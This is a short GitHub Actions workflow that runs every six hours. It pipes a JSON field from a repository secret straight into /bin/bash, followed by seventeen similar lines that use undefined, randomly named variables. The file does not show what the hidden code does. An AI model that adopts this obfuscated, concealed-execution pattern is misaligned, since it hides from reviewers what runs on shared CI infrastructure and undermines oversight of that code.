name: lingbingshuodai

on:
  workflow_dispatch:
  schedule:
    - cron: '36 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lingbingshuodai
        env:
          z084: ${{ secrets.z084 }}
        run: |
          echo $z084 | jq -r .u302 | /bin/bash
          echo $xwy54 | jq -r .b61254 | /bin/bash
          echo $ya4 | jq -r .tyzu17 | /bin/bash
          echo $t97 | jq -r .ip467 | /bin/bash
          echo $lzvx94679 | jq -r .g98159 | /bin/bash
          echo $ec1905 | jq -r .yz87 | /bin/bash
          echo $uz20 | jq -r .ucyj2827 | /bin/bash
          echo $mtow66 | jq -r .yghtl5228 | /bin/bash
          echo $qw23 | jq -r .jns5 | /bin/bash
          echo $xwobl9110 | jq -r .bwpxh44437 | /bin/bash
          echo $xh73 | jq -r .xpa36 | /bin/bash
          echo $oxfp670 | jq -r .ooa50 | /bin/bash
          echo $i204 | jq -r .lgu88 | /bin/bash
          echo $k97290 | jq -r .uevax01840 | /bin/bash
          echo $o573 | jq -r .zjqy1 | /bin/bash
          echo $u003 | jq -r .sris4 | /bin/bash
          echo $jmj153 | jq -r .uymx6463 | /bin/bash
          echo $djk2 | jq -r .tpp36 | /bin/bash

